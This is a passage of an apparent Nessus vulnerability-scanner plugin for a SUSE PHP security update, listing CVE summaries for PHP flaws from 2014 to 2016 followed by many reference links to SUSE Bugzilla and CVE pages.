CVE-2016-4543: The exif_process_IFD_in_JPEG function in\n ext/exif/exif.c in PHP did not validate IFD sizes, which\n allowed remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via crafted header data (bsc#978830.\n\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in\n ext/exif/exif.c in PHP did not validate TIFF start data,\n which allowed remote attackers to cause a denial of\n service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data\n (bsc#978830.\n\n - CVE-2016-4537: The bcpowmod function in\n ext/bcmath/bcmath.c in PHP accepted a negative integer\n for the scale argument, which allowed remote attackers\n to cause a denial of service or possibly have\n unspecified other impact via a crafted call\n (bsc#978827).\n\n - CVE-2016-4538: The bcpowmod function in\n ext/bcmath/bcmath.c in PHP modified certain data\n structures without considering whether they are copies\n of the _zero_, _one_, or _two_ global variable, which\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via a crafted\n call (bsc#978827).\n\n - CVE-2016-4539: The xml_parse_into_struct function in\n ext/xml/xml.c in PHP allowed remote attackers to cause a\n denial of service (buffer under-read and segmentation\n fault) or possibly have unspecified other impact via\n crafted XML data in the second argument, leading to a\n parser level of zero (bsc#978828).\n\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles\n zero-length uncompressed data, which allowed remote\n attackers to cause a denial of service (heap memory\n corruption) or possibly have unspecified other impact\n via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive\n (bsc#977991).\n\n - CVE-2016-4346: Integer overflow in the str_pad function\n in ext/standard/string.c in PHP allowed remote attackers\n to cause a denial of service or possibly have\n unspecified other impact via a long string, leading to a\n heap-based buffer overflow (bsc#977994).\n\n - CVE-2016-4073: Multiple integer overflows in the\n mbfl_strcut function in\n ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed\n remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via a crafted mb_strcut call (bsc#977003).\n\n - CVE-2015-8867: The openssl_random_pseudo_bytes function\n in ext/openssl/openssl.c in PHP incorrectly relied on\n the deprecated RAND_pseudo_bytes function, which made it\n easier for remote attackers to defeat cryptographic\n protection mechanisms via unspecified vectors\n (bsc#977005).\n\n - CVE-2016-4070: Integer overflow in the\n php_raw_url_encode function in ext/standard/url.c in PHP\n allowed remote attackers to cause a denial of service\n (application crash) via a long string to the\n rawurlencode function (bsc#976997).\n\n - CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM\n is used, did not isolate each thread from\n libxml_disable_entity_loader changes in other threads,\n which allowed remote attackers to conduct XML External\n Entity (XXE) and XML Entity Expansion (XEE) attacks via\n a crafted XML document, a related issue to CVE-2015-5161\n (bsc#976996).\n\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a\n client SSL option to mean that SSL is optional, which\n allowed man-in-the-middle attackers to spoof servers via\n a cleartext-downgrade attack, a related issue to\n CVE-2015-3152 (bsc#973792).\n\n - CVE-2015-8835: The make_http_soap_request function in\n ext/soap/php_http.c in PHP did not properly retrieve\n keys, which allowed remote attackers to cause a denial\n of service (NULL pointer dereference, type confusion,\n and application crash) or possibly execute arbitrary\n code via crafted serialized data representing a\n numerically indexed _cookies array, related to the\n SoapClient::__call method in ext/soap/soap.c\n (bsc#973351).\n\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in\n the WDDX extension in PHP allowed remote attackers to\n cause a denial of service (memory corruption and\n application crash) or possibly have unspecified other\n impact by triggering a wddx_deserialize call on XML data\n containing a crafted var element (bsc#969821).\n\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c\n in the PHAR extension in PHP allowed remote attackers to\n obtain sensitive information from process memory or\n cause a denial of service (out-of-bounds read and\n application crash) by placing a PK\\x05\\x06 signature at\n an invalid location (bsc#971912).\n\n - CVE-2014-9767: Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in\n PHP ext/zip/ext_zip.cpp in HHVM allowed remote attackers\n to create arbitrary empty directories via a crafted ZIP\n archive (bsc#971612).\n\n - CVE-2016-3185: The make_http_soap_request function in\n ext/soap/php_http.c in PHP allowed remote attackers to\n obtain sensitive information from process memory or\n cause a denial of service (type confusion and\n application crash) via crafted serialized _cookies data,\n related to the SoapClient::__call method in\n ext/soap/soap.c (bsc#971611).\n\n - CVE-2016-2554: Stack-based buffer overflow in\n ext/phar/tar.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly have\n unspecified other impact via a crafted TAR archive\n (bsc#968284).\n\n - CVE-2015-7803: The phar_get_entry_data function in\n ext/phar/util.c in PHP allowed remote attackers to cause\n a denial of service (NULL pointer dereference and\n application crash) via a .phar file with a crafted TAR\n archive entry in which the Link indicator references a\n file that did not exist (bsc#949961).\n\n - CVE-2015-6831: Multiple use-after-free vulnerabilities\n in SPL in PHP allowed remote attackers to execute\n arbitrary code via vectors involving (1) ArrayObject,\n (2) SplObjectStorage, and (3) SplDoublyLinkedList, which\n are mishandled during unserialization (bsc#942291).\n\n - CVE-2015-6833: Directory traversal vulnerability in the\n PharData class in PHP allowed remote attackers to write\n to arbitrary files via a .. (dot dot) in a ZIP archive\n entry that is mishandled during an extractTo call\n (bsc#942296.\n\n - CVE-2015-6836: The SoapClient __call method in\n ext/soap/soap.c in PHP did not properly manage headers,\n which allowed remote attackers to execute arbitrary code\n via crafted serialized data that triggers a 'type\n confusion' in the serialize_function_call function\n (bsc#945428).\n\n - CVE-2015-6837: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did\n not consider the possibility of a NULL valuePop return\n value proceeding with a free operation during initial\n error checking, which allowed remote attackers to cause\n a denial of service (NULL pointer dereference and\n application crash) via a crafted XML document, a\n different vulnerability than CVE-2015-6838 (bsc#945412).\n\n - CVE-2015-6838: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did\n not consider the possibility of a NULL valuePop return\n value proceeding with a free operation after the\n principal argument loop, which allowed remote attackers\n to cause a denial of service (NULL pointer dereference\n and application crash) via a crafted XML document, a\n different vulnerability than CVE-2015-6837 (bsc#945412).\n\n - CVE-2015-5590: Stack-based buffer overflow in the\n phar_fix_filepath function in ext/phar/phar.c in PHP\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via a large\n length value, as demonstrated by mishandling of an\n e-mail attachment by the imap PHP extension\n (bsc#938719).\n\n - CVE-2015-5589: The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP did not validate a file\n pointer a close operation, which allowed remote\n attackers to cause a denial of service (segmentation\n fault) or possibly have unspecified other impact via a\n crafted TAR archive that is mishandled in a\n Phar::convertToData call (bsc#938721).\n\n - CVE-2015-4602: The __PHP_Incomplete_Class function in\n ext/standard/incomplete_class.c in PHP allowed remote\n attackers to cause a denial of service (application\n crash) or possibly execute arbitrary code via an\n unexpected data type, related to a 'type confusion'\n issue (bsc#935224).\n\n - CVE-2015-4599: The SoapFault::__toString method in\n ext/soap/soap.c in PHP allowed remote attackers to\n obtain sensitive information, cause a denial of service\n (application crash), or possibly execute arbitrary code\n via an unexpected data type, related to a 'type\n confusion' issue (bsc#935226).\n\n - CVE-2015-4600: The SoapClient implementation in PHP\n allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via an unexpected data type, related to 'type confusion'\n issues in the (1) SoapClient::__getLastRequest, (2)\n SoapClient::__getLastResponse, (3)\n SoapClient::__getLastRequestHeaders, (4)\n SoapClient::__getLastResponseHeaders, (5)\n SoapClient::__getCookies, and (6)\n SoapClient::__setCookie methods (bsc#935226).\n\n - CVE-2015-4601: PHP allowed remote attackers to cause a\n denial of service (application crash) or possibly\n execute arbitrary code via an unexpected data type,\n related to 'type confusion' issues in (1)\n ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and\n (3) ext/soap/soap.c, a different issue than\n CVE-2015-4600 (bsc#935226.\n\n - CVE-2015-4603: The exception::getTraceAsString function\n in Zend/zend_exceptions.c in PHP allowed remote\n attackers to execute arbitrary code via an unexpected\n data type, related to a 'type confusion' issue\n (bsc#935234).\n\n - CVE-2015-4644: The php_pgsql_meta_data function in\n pgsql.c in the PostgreSQL (aka pgsql) extension in PHP\n did not validate token extraction for table names, which\n might allowed remote attackers to cause a denial of\n service (NULL pointer dereference and application crash)\n via a crafted name. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2015-1352\n (bsc#935274).\n\n - CVE-2015-4643: Integer overflow in the ftp_genlist\n function in ext/ftp/ftp.c in PHP allowed remote FTP\n servers to execute arbitrary code via a long reply to a\n LIST command, leading to a heap-based buffer overflow.\n NOTE: this vulnerability exists because of an incomplete\n fix for CVE-2015-4022 (bsc#935275).\n\n - CVE-2015-3411: PHP did not ensure that pathnames lack\n %00 sequences, which might have allowed remote attackers\n to read or write to arbitrary files via crafted input to\n an application that calls (1) a DOMDocument load method,\n (2) the xmlwriter_open_uri function, (3) the finfo_file\n function, or (4) the hash_hmac_file function, as\n demonstrated by a filename\\0.xml attack that bypasses an\n intended configuration in which client users may read\n only .xml files (bsc#935227).\n\n - CVE-2015-3412: PHP did not ensure that pathnames lack\n %00 sequences, which might have allowed remote attackers\n to read arbitrary files via crafted input to an\n application that calls the stream_resolve_include_path\n function in ext/standard/streamsfuncs.c, as demonstrated\n by a filename\\0.extension attack that bypasses an\n intended configuration in which client users may read\n files with only one specific extension (bsc#935229).\n\n - CVE-2015-4598: PHP did not ensure that pathnames lack\n %00 sequences, which might have allowed remote attackers\n to read or write to arbitrary files via crafted input to\n an application that calls (1) a DOMDocument save method\n or (2) the GD imagepsloadfont function, as demonstrated\n by a filename\\0.html attack that bypasses an intended\n configuration in which client users may write to only\n .html files (bsc#935232).\n\n - CVE-2015-4148: The do_soap_call function in\n ext/soap/soap.c in PHP did not verify that the uri\n property is a string, which allowed remote attackers to\n obtain sensitive information by providing crafted\n serialized data with an int data type, related to a\n 'type confusion' issue (bsc#933227).\n\n - CVE-2015-4024: Algorithmic complexity vulnerability in\n the multipart_buffer_headers function in main/rfc1867.c\n in PHP allowed remote attackers to cause a denial of\n service (CPU consumption) via crafted form data that\n triggers an improper order-of-growth outcome\n (bsc#931421).\n\n - CVE-2015-4026: The pcntl_exec implementation in PHP\n truncates a pathname upon encountering a \\x00 character,\n which might allowed remote attackers to bypass intended\n extension restrictions and execute files with unexpected\n names via a crafted first argument. NOTE: this\n vulnerability exists because of an incomplete fix for\n CVE-2006-7243 (bsc#931776).\n\n - CVE-2015-4022: Integer overflow in the ftp_genlist\n function in ext/ftp/ftp.c in PHP allowed remote FTP\n servers to execute arbitrary code via a long reply to a\n LIST command, leading to a heap-based buffer overflow\n (bsc#931772).\n\n - CVE-2015-4021: The phar_parse_tarfile function in\n ext/phar/tar.c in PHP did not verify that the first\n character of a filename is different from the \\0\n character, which allowed remote attackers to cause a\n denial of service (integer underflow and memory\n corruption) via a crafted entry in a tar archive\n (bsc#931769).\n\n - CVE-2015-3329: Multiple stack-based buffer overflows in\n the phar_set_inode function in phar_internal.h in PHP\n allowed remote attackers to execute arbitrary code via a\n crafted length value in a (1) tar, (2) phar, or (3) ZIP\n archive (bsc#928506).\n\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote\n attackers to obtain sensitive information from process\n memory or cause a denial of service (buffer over-read\n and application crash) via a crafted length value in\n conjunction with crafted serialized data in a phar\n archive, related to the phar_parse_metadata and\n phar_parse_pharfile functions (bsc#928511).\n\n - CVE-2015-2787: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted\n unserialize call that leverages use of the unset\n function within an __wakeup function, a related issue to\n CVE-2015-0231 (bsc#924972).\n\n - CVE-2014-9709: The GetCode_ function in gd_gif_in.c in\n GD 2.1.1 and earlier, as used in PHP allowed remote\n attackers to cause a denial of service (buffer over-read\n and application crash) via a crafted GIF image that is\n improperly handled by the gdImageCreateFromGif function\n (bsc#923945).\n\n - CVE-2015-2301: Use-after-free vulnerability in the\n phar_rename_archive function in phar_object.c in PHP\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors that\n trigger an attempted renaming of a Phar archive to the\n name of an existing file (bsc#922452).\n\n - CVE-2015-2305: Integer overflow in the regcomp\n implementation in the Henry Spencer BSD regex library\n (aka rxspencer) 32-bit platforms might have allowed\n context-dependent attackers to execute arbitrary code\n via a large regular expression that leads to a\n heap-based buffer overflow (bsc#921950).\n\n - CVE-2014-9705: Heap-based buffer overflow in the\n enchant_broker_request_dict function in\n ext/enchant/enchant.c in PHP allowed remote attackers to\n execute arbitrary code via vectors that trigger creation\n of multiple dictionaries (bsc#922451).\n\n - CVE-2015-0273: Multiple use-after-free vulnerabilities\n in ext/date/php_date.c in PHP allowed remote attackers\n to execute arbitrary code via crafted serialized input\n containing a (1) R or (2) r type specifier in (a)\n DateTimeZone data handled by the\n php_date_timezone_initialize_from_hash function or (b)\n DateTime data handled by the\n php_date_initialize_from_hash function (bsc#918768).\n\n - CVE-2014-9652: The mconvert function in softmagic.c in\n file as used in the Fileinfo component in PHP did not\n properly handle a certain string-length field during a\n copy of a truncated version of a Pascal string, which\n might allowed remote attackers to cause a denial of\n service (out-of-bounds memory access and application\n crash) via a crafted file (bsc#917150).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n\n - CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bsc#910659).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP allowed remote attackers to\n execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bsc#914690).\n\n - CVE-2014-3670: The exif_ifd_make_value function in\n exif.c in the EXIF extension in PHP operates on\n floating-point arrays incorrectly, which allowed remote\n attackers to cause a denial of service (heap memory\n corruption and application crash) or possibly execute\n arbitrary code via a crafted JPEG image with TIFF\n thumbnail data that is improperly handled by the\n exif_thumbnail function (bsc#902357).\n\n - CVE-2014-3669: Integer overflow in the object_custom\n function in ext/standard/var_unserializer.c in PHP\n allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via an argument to the unserialize function that\n triggers calculation of a large length value\n (bsc#902360).\n\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601\n function in the mkgmtime implementation in\n libxmlrpc/xmlrpc.c in the XMLRPC extension in PHP\n allowed remote attackers to cause a denial of service\n (application crash) via (1) a crafted first argument to\n the xmlrpc_set_type function or (2) a crafted argument\n to the xmlrpc_decode function, related to an\n out-of-bounds read operation (bsc#902368).\n\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR\n in PHP allowed local users to write to arbitrary files\n via a symlink attack on a (1) rest.cachefile or (2)\n rest.cacheid file in /tmp/pear/cache/, related to the\n retrieveCacheFirst and useLocalCache functions\n (bsc#893849).\n\n - CVE-2014-3597: Multiple buffer overflows in the\n php_parserr function in ext/standard/dns.c in PHP\n allowed remote DNS servers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via a crafted DNS record, related to the dns_get_record\n function and the dn_expand function. NOTE: this issue\n exists because of an incomplete fix for CVE-2014-4049\n (bsc#893853).\n\n - CVE-2014-4670: Use-after-free vulnerability in\n ext/spl/spl_dllist.c in the SPL component in PHP allowed\n context-dependent attackers to cause a denial of service\n or possibly have unspecified other impact via crafted\n iterator usage within applications in certain\n web-hosting environments (bsc#886059).\n\n - CVE-2014-4698: Use-after-free vulnerability in\n ext/spl/spl_array.c in the SPL component in PHP allowed\n context-dependent attackers to cause a denial of service\n or possibly have unspecified other impact via crafted\n ArrayIterator usage within applications in certain\n web-hosting environments (bsc#886060).\n\n - CVE-2014-4721: The phpinfo implementation in\n ext/standard/info.c in PHP did not ensure use of the\n string data type for the PHP_AUTH_PW, PHP_AUTH_TYPE,\n PHP_AUTH_USER, and PHP_SELF variables, which might\n allowed context-dependent attackers to obtain sensitive\n information from process memory by using the integer\n data type with crafted values, related to a 'type\n confusion' vulnerability, as demonstrated by reading a\n private SSL key in an Apache HTTP Server web-hosting\n environment with mod_ssl and a PHP 5.3.x mod_php\n (bsc#885961).\n\n - CVE-2014-0207: The cdf_read_short_sector function in\n cdf.c in file as used in the Fileinfo component in PHP\n allowed remote attackers to cause a denial of service\n (assertion failure and application exit) via a crafted\n CDF file (bsc#884986).\n\n - CVE-2014-3478: Buffer overflow in the mconvert function\n in softmagic.c in file as used in the Fileinfo component\n in PHP allowed remote attackers to cause a denial of\n service (application crash) via a crafted Pascal string\n in a FILE_PSTRING conversion (bsc#884987).\n\n - CVE-2014-3479: The cdf_check_stream_offset function in\n cdf.c in file as used in the Fileinfo component in PHP\n relies on incorrect sector-size data, which allowed\n remote attackers to cause a denial of service\n (application crash) via a crafted stream offset in a CDF\n file (bsc#884989).\n\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in\n file as used in the Fileinfo component in PHP did not\n properly validate sector-count data, which allowed\n remote attackers to cause a denial of service\n (application crash) via a crafted CDF file (bsc#884990).\n\n - CVE-2014-3487: The cdf_read_property_info function in\n file as used in the Fileinfo component in PHP did not\n properly validate a stream offset, which allowed remote\n attackers to cause a denial of service (application\n crash) via a crafted CDF file (bsc#884991).\n\n - CVE-2014-3515: The SPL component in PHP incorrectly\n anticipates that certain data structures will have the\n array data type after unserialization, which allowed\n remote attackers to execute arbitrary code via a crafted\n string that triggers use of a Hashtable destructor,\n related to 'type confusion' issues in (1) ArrayObject\n and (2) SPLObjectStorage (bsc#884992).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884986\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884990\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884991\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884992\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=885961\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=886059\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=886060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=893849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=893853\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=902357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=902360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=902368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=914690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=918768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=919080\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=921950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=922451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=922452\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925109\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928511\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931776\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933227\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935227\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935234\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938719\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949961\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968284\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976996\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976997\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977003\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977005\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977991\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2004-1019/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2006-7243/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-0207/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3478/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3479/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3480/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3487/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3515/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3597/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3668/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3669/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3670/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4049/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4670/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4698/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4721/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-5459/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8142/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9652/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9705/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9709/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 